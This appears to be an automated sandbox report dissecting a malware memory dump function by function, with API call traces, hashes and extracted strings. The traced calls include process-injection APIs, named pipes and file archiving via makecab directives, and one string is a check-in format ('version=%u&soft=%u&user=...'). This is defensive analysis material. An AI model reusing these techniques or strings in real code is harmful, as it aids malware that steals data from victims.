String ID: DelegateExecute$SOFTWARE\Classes\Chrome
API String ID: 3961825720-1743081400
Opcode ID: 41dfe35cdb999d1292a2100c05b130543be8811de81e97acb910a624ae635f1c
Instruction ID: 37db5575998bc8488028a92ea1b3562b4c03f49d10e87f31fa763d7ebd533a4e
Opcode Fuzzy Hash: 41dfe35cdb999d1292a2100c05b130543be8811de81e97acb910a624ae635f1c
Instruction Fuzzy Hash: E8315071600209FFEF219FA8DD85A9EBBB9EF04314F108069FD05A61A0DBB5EE11DB50

Uniqueness

Uniqueness Score: -1.00%

Function 04A0BE7C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 04A0BE9E

Part of subcall function 049F75AA: NtAllocateVirtualMemory.NTDLL(04A0BEC6,00000000,00000000,04A0BEC6,00003000,00000040), ref: 049F75DB
Part of subcall function 049F75AA: RtlNtStatusToDosError.NTDLL(00000000), ref: 049F75E2
Part of subcall function 049F75AA: SetLastError.KERNEL32(00000000), ref: 049F75E9

GetLastError.KERNEL32(?,00000318,00000008), ref: 04A0BFAE

Part of subcall function 04A0FF30: RtlNtStatusToDosError.NTDLL(00000000), ref: 04A0FF48

memcpy.NTDLL(00000218,04A11CB0,00000100,?,00010003,?,?,00000318,00000008), ref: 04A0BF2D
RtlNtStatusToDosError.NTDLL(00000000), ref: 04A0BF87

Strings

, xrefs: 04A0BEF4

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Error$Status$Last$AllocateMemoryVirtualmemcpymemset
String ID:
API String ID: 2966525677-3916222277
Opcode ID: a960bbdbce88086b4c13698fe480de0baa50326484bd7fdd6afa7d26944d848b
Instruction ID: 5a4e4ff48aa139e27ae3b75385096cbd820ffd0f26c0208a73896fc7ef23ad07
Opcode Fuzzy Hash: a960bbdbce88086b4c13698fe480de0baa50326484bd7fdd6afa7d26944d848b
Instruction Fuzzy Hash: 1F315471901209AFEB21DFA4EA84AAAB7B8EF14344F10856AE555D72D0E730FE458F60

Uniqueness

Uniqueness Score: -1.00%

Function 049F5CA8, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45libraryloaderCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(?,?,74B5F720,?,04A0F243,00000000,?,?,?,049F1A0B), ref: 049F5CCC
GetModuleHandleA.KERNEL32(NTDLL.DLL,LdrUnregisterDllNotification,?,74B5F720,?,04A0F243,00000000,?,?,?,049F1A0B), ref: 049F5CE0
GetProcAddress.KERNEL32(00000000), ref: 049F5CE7

Strings

LdrUnregisterDllNotification, xrefs: 049F5CD6
NTDLL.DLL, xrefs: 049F5CDB

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: AddressHandleModuleProcVersion
String ID: LdrUnregisterDllNotification$NTDLL.DLL
API String ID: 3310240892-3940208311
Opcode ID: a4dd0efa43497d9dad17dec84b88f62b7a7f69455ebb7c1d218726557c6a7b66
Instruction ID: 7e981f70d6a55d50a5f4eac41ada2e21336a50b238b97fa62312a55eb3f465c9
Opcode Fuzzy Hash: a4dd0efa43497d9dad17dec84b88f62b7a7f69455ebb7c1d218726557c6a7b66
Instruction Fuzzy Hash: 97016275202201BFEB249F28ED48916B7EDFF583147168469FA0A97362DB35FC02CB60

Uniqueness

Uniqueness Score: -1.00%

Function 04A012B3, Relevance: 6.0, APIs: 4, Instructions: 45pipeCOMMON

Download Yara Rule

APIs

CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,04A17160,00000001), ref: 04A012D7
GetLastError.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,04A03698), ref: 04A01322

Part of subcall function 04A08CE0: CreateThread.KERNELBASE(00000000,00000000,00000000,?,00000000,049F2288), ref: 04A08CF7
Part of subcall function 04A08CE0: QueueUserAPC.KERNELBASE(?,00000000,?,?,049FB525,049F5FCD,00000000,?,?,?,?,049F1141,?,?), ref: 04A08D0C
Part of subcall function 04A08CE0: GetLastError.KERNEL32(00000000,?,049FB525,049F5FCD,00000000,?,?,?,?,049F1141,?,?), ref: 04A08D17
Part of subcall function 04A08CE0: TerminateThread.KERNEL32(00000000,00000000,?,049FB525,049F5FCD,00000000,?,?,?,?,049F1141,?,?), ref: 04A08D21
Part of subcall function 04A08CE0: CloseHandle.KERNEL32(00000000,?,049FB525,049F5FCD,00000000,?,?,?,?,049F1141,?,?), ref: 04A08D28
Part of subcall function 04A08CE0: SetLastError.KERNEL32(00000000,?,049FB525,049F5FCD,00000000,?,?,?,?,049F1141,?,?), ref: 04A08D31

GetLastError.KERNEL32(Function_000090CC,00000000,00000000,?,00000000), ref: 04A0130A
CloseHandle.KERNEL32(00000000,?,00000000), ref: 04A0131A

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: ErrorLast$CloseCreateHandleThread$NamedPipeQueueTerminateUser
String ID:
API String ID: 1700061692-0
Opcode ID: f02b0df3d04ae62eaa0ff61e8c08b50ad18ec0b990e58504291c0f7663579d0e
Instruction ID: afbfe9bda1f89f42e97ba16f8cc8977e71237047596ef67dcad693cb33ecf5e7
Opcode Fuzzy Hash: f02b0df3d04ae62eaa0ff61e8c08b50ad18ec0b990e58504291c0f7663579d0e
Instruction Fuzzy Hash: FFF0A474302301AFF7516A68EC48EA777A8EB45335B004235FA61C32E0DA685C068671

Uniqueness

Uniqueness Score: -1.00%

Function 04A03F13, Relevance: 4.5, APIs: 3, Instructions: 45nativethreadCOMMON

Download Yara Rule

APIs

NtQueryInformationThread.NTDLL(?,00000000,?,0000001C,00000000), ref: 04A03F27
GetLastError.KERNEL32(?,?,?,0000001C,?), ref: 04A03F67

Part of subcall function 04A0547E: NtWriteVirtualMemory.NTDLL(00000318,00000000,00000000,?,04A0BF68,00000000,?,04A0BF68,?,00000000,00000000,00000318,00000020,?,00010003,?), ref: 04A0549C

RtlNtStatusToDosError.NTDLL(00000000), ref: 04A03F70

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Error$InformationLastMemoryQueryStatusThreadVirtualWrite
String ID:
API String ID: 4036914670-0
Opcode ID: 885859939e380bf4156da1e065419b8e05dc0320cd67171b5faa4eb2dca9b754
Instruction ID: d46923c56771dc52fbb3255f2730bb7379d66f0128f62aa9ce55ace77ff92295
Opcode Fuzzy Hash: 885859939e380bf4156da1e065419b8e05dc0320cd67171b5faa4eb2dca9b754
Instruction Fuzzy Hash: FA01D675940208BAEF10AEA6ED49DAEBBBDEB94740F104025FD41E60A0E765E9059B60

Uniqueness

Uniqueness Score: -1.00%

Function 04A02B53, Relevance: 3.0, APIs: 2, Instructions: 48nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 04A02B84
RtlNtStatusToDosError.NTDLL(C000009A), ref: 04A02BBB

Part of subcall function 04A02A35: RtlFreeHeap.NTDLL(00000000,?,049F10F7,?,?,0000002C,?), ref: 04A02A41

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: ErrorFreeHeapInformationQueryStatusSystem
String ID:
API String ID: 2533303245-0
Opcode ID: 81f9d0a1689b9e9cd02dda4599691928766e8117a9caf854852a46cb3ccdb8e5
Instruction ID: e87bca203a46ee6c9f95237c978457982c80afb16dc892571aadab4edf9b74cf
Opcode Fuzzy Hash: 81f9d0a1689b9e9cd02dda4599691928766e8117a9caf854852a46cb3ccdb8e5
Instruction Fuzzy Hash: 4F01A733901720ABDB226F55A90CBAF7A29DF76B54F018194ED0167140E774AD019690

Uniqueness

Uniqueness Score: -1.00%

Function 04A1096B, Relevance: 3.0, APIs: 2, Instructions: 37nativeCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 04A1098A
NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 04A109A2

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuerymemset
String ID:
API String ID: 2040988606-0
Opcode ID: 5a53162ee95cd7ccb9a90bb680ef631fd7a91b76cad7fda5d48576a4f9d0c6d5
Instruction ID: dc1617168fe23469fa59a0c529122f132072fa874916ef523ba58619551d158e
Opcode Fuzzy Hash: 5a53162ee95cd7ccb9a90bb680ef631fd7a91b76cad7fda5d48576a4f9d0c6d5
Instruction Fuzzy Hash: 82F012B694422CBAEF10EA95DC49FDE7F7CEB14740F008061AE08E6191D774EB558BA1

Uniqueness

Uniqueness Score: -1.00%

Function 049F86CB, Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

RtlNtStatusToDosError.NTDLL(C0000002), ref: 049F86F8
SetLastError.KERNEL32(00000000), ref: 049F86FF

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Error$LastStatus
String ID:
API String ID: 4076355890-0
Opcode ID: 1d81611263f0814bbd4f23753b06ff7ddc3972963baee3a9a09731c21c7473e7
Instruction ID: 798684a94f4f055a3e75f338f4b67a49d6c5bd5733286736a844e1880f81c8f2
Opcode Fuzzy Hash: 1d81611263f0814bbd4f23753b06ff7ddc3972963baee3a9a09731c21c7473e7
Instruction Fuzzy Hash: D7E0B83621021AABDF016FD59C04D9A7B5DFF5C751B058420FF01D6120D735DC619BA4

Uniqueness

Uniqueness Score: -1.00%

Function 04A0D1D5, Relevance: 1.9, APIs: 1, Instructions: 611COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 04A0D871

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 41718c86b7f539ecea4a526c5036cc66cec82065e0a105faf7df44087b3bea37
Instruction ID: 2100b1a158fdacc6c2efb418cbaeff7cd2733e7fdf8b82d116103c02531b8acb
Opcode Fuzzy Hash: 41718c86b7f539ecea4a526c5036cc66cec82065e0a105faf7df44087b3bea37
Instruction Fuzzy Hash: 0E22847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0

Uniqueness

Uniqueness Score: -1.00%

Function 04A08C82, Relevance: 1.5, APIs: 1, Instructions: 38processCOMMON

Download Yara Rule

APIs

CreateProcessAsUserA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?), ref: 04A08CBC

Part of subcall function 049F6932: ResumeThread.KERNEL32(00000004,?,049FCD8A,?), ref: 049F6947

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: CreateProcessResumeThreadUser
String ID:
API String ID: 3393100766-0
Opcode ID: ff72116059618917bcf46555f72811b4a685a24ac221b27ccae02ff596d8c53d
Instruction ID: 3e1d48a042d7bdea29b02a13b2ea0b4b3b6d7ab37648d1f6088bbc59cbeebb54
Opcode Fuzzy Hash: ff72116059618917bcf46555f72811b4a685a24ac221b27ccae02ff596d8c53d
Instruction Fuzzy Hash: AFF0F932205209AFAF025F99DC41CDA7F6AFF49374B054229FE1892160C736EC32AB94

Uniqueness

Uniqueness Score: -1.00%

Function 04A0FF30, Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

RtlNtStatusToDosError.NTDLL(00000000), ref: 04A0FF48

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: ErrorStatus
String ID:
API String ID: 1596131371-0
Opcode ID: 7da229565d35f3ae7135e7f071af218608afdef83e7e629d09eaaf99be1f4980
Instruction ID: 4a38866057c546b1e184f28ea73c0bca93c6bb9037f7933cdc8ef7e248fc2e4c
Opcode Fuzzy Hash: 7da229565d35f3ae7135e7f071af218608afdef83e7e629d09eaaf99be1f4980
Instruction Fuzzy Hash: 1AC012725082036BDF195B51DD1892A7A16FF74300F04841CB549D40B0CA74A851C700

Uniqueness

Uniqueness Score: -1.00%

Function 04A121B4, Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction ID: 7d55e39ca534425ecd7dd6877f9c7d314639b727137ccd4a5ee8e8590de1fa37
Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction Fuzzy Hash: 9B21C8739042049FDB14DF68C8C0AABB7A5FF49350B0585A8DD55AF255EB30F925CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 049F8771, Relevance: 62.0, APIs: 41, Instructions: 451synchronizationtimethreadCOMMON

Download Yara Rule

APIs

Part of subcall function 04A0E606: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 04A0E63A
Part of subcall function 04A0E606: GetLastError.KERNEL32(?,?,?,00000000,?,?,?), ref: 04A0E6FB
Part of subcall function 04A0E606: ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 04A0E704

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?), ref: 049F8811

Part of subcall function 04A08869: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 04A08883
Part of subcall function 04A08869: CreateWaitableTimerA.KERNEL32(04A17160,00000003,?), ref: 04A088A0
Part of subcall function 04A08869: GetLastError.KERNEL32(?,?,04A0E66E,?,?,?,00000000,?,?,?), ref: 04A088B1
Part of subcall function 04A08869: GetSystemTimeAsFileTime.KERNEL32(?,00000000,04A0E66E,?,?,?,04A0E66E,?), ref: 04A088F1
Part of subcall function 04A08869: SetWaitableTimer.KERNEL32(00000000,04A0E66E,00000000,00000000,00000000,00000000,?,?,04A0E66E,?), ref: 04A08910
Part of subcall function 04A08869: HeapFree.KERNEL32(00000000,04A0E66E,00000000,04A0E66E,?,?,?,04A0E66E,?), ref: 04A08926

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?), ref: 049F8876
StrChrA.SHLWAPI(00000000,0000007C,00000131,00000000,00000000,00000000,00000000,00000000), ref: 049F8906
StrTrimA.SHLWAPI(00000000,0A0D0920), ref: 049F8928
StrChrA.SHLWAPI(00000000,0000003D), ref: 049F892D
StrTrimA.SHLWAPI(00000001,0A0D0920), ref: 049F8950
StrTrimA.SHLWAPI(00000000,0A0D0920), ref: 049F895F
_strupr.NTDLL ref: 049F8962
lstrlen.KERNEL32(00000000,00000000), ref: 049F896B

Part of subcall function 04A0A7E9: RtlAllocateHeap.NTDLL(00000000,00000010), ref: 04A0A80B
Part of subcall function 04A0A7E9: HeapFree.KERNEL32(00000000,00000000,00000129,00000000,00000000,?,?,74B5F730,?,?,?,049F884C,?), ref: 04A0A83C

Part of subcall function 04A07970: HeapFree.KERNEL32(00000000,00000000,?,74B5F730,00000000), ref: 04A07A13
Part of subcall function 04A07970: GetCurrentThreadId.KERNEL32 ref: 04A07AB9
Part of subcall function 04A07970: GetCurrentThread.KERNEL32 ref: 04A07ACA

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 049F89C2
CloseHandle.KERNEL32(?), ref: 049F8CF4

Part of subcall function 049F2D2F: RegCreateKeyA.ADVAPI32(80000001,05A987E8,?), ref: 049F2D44
Part of subcall function 049F2D2F: lstrlen.KERNEL32(05A987E8,00000000,00000000,00000028,?,?,?,?,04A0F9C6,00000001,?), ref: 049F2D72

WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 049F8A68
WaitForSingleObject.KERNEL32(?,00000000,?), ref: 049F8A9F
WaitForSingleObject.KERNEL32(?,00000000), ref: 049F8AAE
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 049F8ADC
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 049F8AF6
_allmul.NTDLL(0000012C,00000000,FF676980,000000FF), ref: 049F8B3E
SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,0000012C,00000000,FF676980,000000FF,00000000), ref: 049F8B58
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 049F8B6E
ReleaseMutex.KERNEL32(?), ref: 049F8B8D
WaitForSingleObject.KERNEL32(?,00000000), ref: 049F8B9E
WaitForSingleObject.KERNEL32(?,00000000), ref: 049F8BAD
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 049F8BE2
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 049F8BFC
SwitchToThread.KERNEL32 ref: 049F8BFE
ReleaseMutex.KERNEL32(?), ref: 049F8C08
WaitForSingleObject.KERNEL32(?,00000000), ref: 049F8C40
WaitForSingleObject.KERNEL32(?,00000000), ref: 049F8C4B
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 049F8C6F
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 049F8C89
SwitchToThread.KERNEL32 ref: 049F8C8B
ReleaseMutex.KERNEL32(?), ref: 049F8C95
WaitForSingleObject.KERNEL32(?,00000000), ref: 049F8CAA
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 049F8D08
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 049F8D14
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 049F8D20
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 049F8D2C
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 049F8D38
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 049F8D44
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 049F8D50
RtlExitUserThread.NTDLL(?,?,?,?,?,?,?,?), ref: 049F8D62

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Wait$CloseHandle$ObjectSingleTimerWaitable$MultipleObjectsThread$HeapMutexRelease_allmul$CreateFreeTrim$CurrentErrorLastSwitchTimelstrlen$AllocateEventExitFileOpenSystemUser_strupr
String ID:
API String ID: 1948779846-0
Opcode ID: 566c49b20f18875da192217b74b5a0d686c7d00988a45f1489ef8abb43f8ac37
Instruction ID: 028617b566d703f579d8d395de6bcedc6a839c5b19eda8e26c4716bce27274ad
Opcode Fuzzy Hash: 566c49b20f18875da192217b74b5a0d686c7d00988a45f1489ef8abb43f8ac37
Instruction Fuzzy Hash: 45F17BB1508345AFEB51EFA4DD8492ABBEDFB94354F00493EF691921A0D734EC468F12

Uniqueness

Uniqueness Score: -1.00%

Function 049FD754, Relevance: 56.2, APIs: 26, Strings: 6, Instructions: 225filememoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00001000,00000000), ref: 049FD772
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 049FD795
StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 049FD7AD
wsprintfA.USER32 ref: 049FD7D3
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?), ref: 049FD7E4
wsprintfA.USER32 ref: 049FD802
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?), ref: 049FD813
GetFileAttributesA.KERNEL32(00000008,?,?,?,?,?,?,?), ref: 049FD818
wsprintfA.USER32 ref: 049FD82D
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 049FD83E
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 049FD84C
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 049FD9C3
GetLastError.KERNEL32 ref: 049FD9CB
HeapFree.KERNEL32(00000000,?), ref: 049FD9DE

Strings

"%s", xrefs: 049FD825
.set CabinetName1="%s", xrefs: 049FD7FA
.set DestinationDir="%S", xrefs: 049FD91E, 049FD93E
"%S", xrefs: 049FD95C
.set MaxDiskSize=0.set DiskDirectory1="%s", xrefs: 049FD7CB
*.*, xrefs: 049FD8AE

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: File$Writewsprintf$ErrorHeapLast$AllocateAttributesCloseCreateFreeHandle
String ID: "%S"$"%s"$*.*$.set CabinetName1="%s"$.set DestinationDir="%S"$.set MaxDiskSize=0.set DiskDirectory1="%s"
API String ID: 3254920416-2937155979
Opcode ID: f514754852f3210c8eb280f43d2472a382ce7572e215ff38c5221bfbebe4d845
Instruction ID: c26ba6f4286d234e0af66d53a85a6ca912c2aa1a133f05254a1e3e39139864db
Opcode Fuzzy Hash: f514754852f3210c8eb280f43d2472a382ce7572e215ff38c5221bfbebe4d845
Instruction Fuzzy Hash: 2F8129B5900209FFEF019F94DC84DAEBBB9FF18304F008569F906A6260E775AA51DF60

Uniqueness

Uniqueness Score: -1.00%

Function 049FDE90, Relevance: 47.6, APIs: 15, Strings: 12, Instructions: 377memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(,?,04A170E8), ref: 049FDEE8
RtlAllocateHeap.NTDLL(00000000,04A16A91,?), ref: 049FDF82
lstrcpyn.KERNEL32(00000000,?,04A16A91,?,04A170E8), ref: 049FDF97
HeapFree.KERNEL32(00000000,00000000,00000000,?,04A170E8), ref: 049FDFB3
StrChrA.SHLWAPI(?,00000020,?,00000000,00000000,?,04A16A90,?,?,04A170E8), ref: 049FE08B
StrChrA.SHLWAPI(00000001,00000020,?,04A170E8), ref: 049FE09C
lstrlen.KERNEL32(00000000,?,04A170E8), ref: 049FE0B0
memmove.NTDLL(04A16A91,?,00000001,?,04A170E8), ref: 049FE0C0
lstrlen.KERNEL32(?,?,00000000,00000000,?,04A16A90,?,?,04A170E8), ref: 049FE0E3
RtlAllocateHeap.NTDLL(00000000,?), ref: 049FE109
memcpy.NTDLL(00000000,?,?,?,04A170E8), ref: 049FE11D
memcpy.NTDLL(04A16A90,?,?,?,04A170E8), ref: 049FE13D
HeapFree.KERNEL32(00000000,04A16A90,?,?,?,?,?,?,?,?,04A170E8), ref: 049FE179
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 049FE23F
HeapFree.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,00000001), ref: 049FE287

Strings

User-Agent:, xrefs: 049FDF61
, xrefs: 049FDEE3, 049FDF14
PUT , xrefs: 049FDEBC
Accept-Encoding:, xrefs: 049FE0D0
OPTI, xrefs: 049FE080
Content-Type:, xrefs: 049FDFE5
OPTI, xrefs: 049FDECA
POST, xrefs: 049FDEC3
ocsp, xrefs: 049FDFF2
GET , xrefs: 049FE078
GET , xrefs: 049FDEB5
identity, xrefs: 049FE0CB

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFreelstrlen$memcpy$lstrcpynmemmove
String ID: $ identity$Accept-Encoding:$Content-Type:$GET $GET $OPTI$OPTI$POST$PUT $User-Agent:$ocsp
API String ID: 3227826163-2797658706
Opcode ID: 737caf351a83460339cace1c2a008732e48843a361a972643d7cbb7364c9731a
Instruction ID: c1cc89a3e46c50f2f91be4289eb316fce2a281c9f9963d7db33e56a37c26fe9d
Opcode Fuzzy Hash: 737caf351a83460339cace1c2a008732e48843a361a972643d7cbb7364c9731a
Instruction Fuzzy Hash: D1D14935A00205EFEF11DFA8CC84BA9BBB9FF04710F148568EA15AB2A0D735EA51DB50

Uniqueness

Uniqueness Score: -1.00%

Function 049F30D2, Relevance: 42.3, APIs: 28, Instructions: 263memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 049F30F3
GetTickCount.KERNEL32 ref: 049F310D
wsprintfA.USER32 ref: 049F3160
QueryPerformanceFrequency.KERNEL32(?), ref: 049F316C
QueryPerformanceCounter.KERNEL32(?), ref: 049F3177
_aulldiv.NTDLL(?,?,?,?), ref: 049F318D
wsprintfA.USER32 ref: 049F31A3
wsprintfA.USER32 ref: 049F31C8
HeapFree.KERNEL32(00000000,?), ref: 049F31DB
wsprintfA.USER32 ref: 049F31FF
HeapFree.KERNEL32(00000000,?), ref: 049F3212
wsprintfA.USER32 ref: 049F324C
wsprintfA.USER32 ref: 049F3270
lstrcat.KERNEL32(?,726F7426), ref: 049F32A8

Part of subcall function 049FCD9A: WaitForSingleObject.KERNEL32(00000000,00000000,00000000), ref: 049FCE5A

RtlAllocateHeap.NTDLL(00000000,00000800), ref: 049F32C2
GetTickCount.KERNEL32 ref: 049F32D2
RtlEnterCriticalSection.NTDLL(05A98D20), ref: 049F32E6
RtlLeaveCriticalSection.NTDLL(05A98D20), ref: 049F3304
StrTrimA.SHLWAPI(00000000,04A133F4,00000000,05A98D60), ref: 049F333D
lstrcpy.KERNEL32(00000000,?), ref: 049F3365
lstrcpy.KERNEL32(00000000,00000000), ref: 049F336C
lstrcat.KERNEL32(00000000,?), ref: 049F3373
lstrcat.KERNEL32(00000000,?), ref: 049F337A
HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?,00000001), ref: 049F33F5
HeapFree.KERNEL32(00000000,?,00000000), ref: 049F3407
HeapFree.KERNEL32(00000000,00000000,00000000,05A98D60), ref: 049F3416
HeapFree.KERNEL32(00000000,00000000), ref: 049F3428
HeapFree.KERNEL32(00000000,?), ref: 049F343A

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$wsprintf$lstrcat$AllocateCountCriticalPerformanceQuerySectionTicklstrcpy$CounterEnterFrequencyLeaveObjectSingleTrimWait_aulldiv
String ID:
API String ID: 3322690043-0
Opcode ID: 969131cd7117080a846f4fbb29f17a44cfaae54d78f301604fc2d42d211cd1c1
Instruction ID: 114d8bba7bc3a2c5d0c64c3da1af8128d5cdcb0ea88d7c5bd48e2dd061c45469
Opcode Fuzzy Hash: 969131cd7117080a846f4fbb29f17a44cfaae54d78f301604fc2d42d211cd1c1
Instruction Fuzzy Hash: 2FA16971100205AFEB12DFA8EC84E9A3BF9FB58314F044429FA58D62B0D779ED56CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04A10127, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 249memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 04A1015D
wsprintfA.USER32 ref: 04A101BE
wsprintfA.USER32 ref: 04A10204
wsprintfA.USER32 ref: 04A10225
lstrcat.KERNEL32(00000000,726F7426), ref: 04A10256
wsprintfA.USER32 ref: 04A10283
HeapFree.KERNEL32(00000000,?), ref: 04A10296
wsprintfA.USER32 ref: 04A102B5
HeapFree.KERNEL32(00000000,?), ref: 04A102C6
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04A102E0
RtlEnterCriticalSection.NTDLL(05A98D20), ref: 04A102F9
RtlLeaveCriticalSection.NTDLL(05A98D20), ref: 04A10317

Part of subcall function 04A01AF5: lstrlen.KERNEL32(00000000,253D7325,00000000,7742C740,74B481D0,?,?,049F331A,00000000,05A98D60), ref: 04A01B20
Part of subcall function 04A01AF5: lstrlen.KERNEL32(?,?,?,049F331A,00000000,05A98D60), ref: 04A01B28
Part of subcall function 04A01AF5: strcpy.NTDLL ref: 04A01B3F
Part of subcall function 04A01AF5: lstrcat.KERNEL32(00000000,?), ref: 04A01B4A
Part of subcall function 04A01AF5: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,049F331A,00000000,05A98D60), ref: 04A01B67

StrTrimA.SHLWAPI(00000000,04A133F4,00000000,05A98D60), ref: 04A1034D

Part of subcall function 049FF5BA: lstrlen.KERNEL32(?,00000000,00000000,049F334F,00000000), ref: 049FF5C6
Part of subcall function 049FF5BA: lstrlen.KERNEL32(?), ref: 049FF5CE
Part of subcall function 049FF5BA: lstrcpy.KERNEL32(00000000,?), ref: 049FF5E5
Part of subcall function 049FF5BA: lstrcat.KERNEL32(00000000,?), ref: 049FF5F0

lstrcpy.KERNEL32(00000000,?), ref: 04A10376
lstrcpy.KERNEL32(00000000,00000000), ref: 04A1037D
lstrcat.KERNEL32(00000000,?), ref: 04A1038A
lstrcat.KERNEL32(00000000,?), ref: 04A10391
HeapFree.KERNEL32(00000000,?,00000000,00000000,00000000,?), ref: 04A10411
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04A10420
HeapFree.KERNEL32(00000000,00000000,00000000,05A98D60), ref: 04A1042B
HeapFree.KERNEL32(00000000,00000000), ref: 04A10439
HeapFree.KERNEL32(00000000,00000000), ref: 04A10444

Strings

version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s, xrefs: 04A101B8

Memory Dump Source

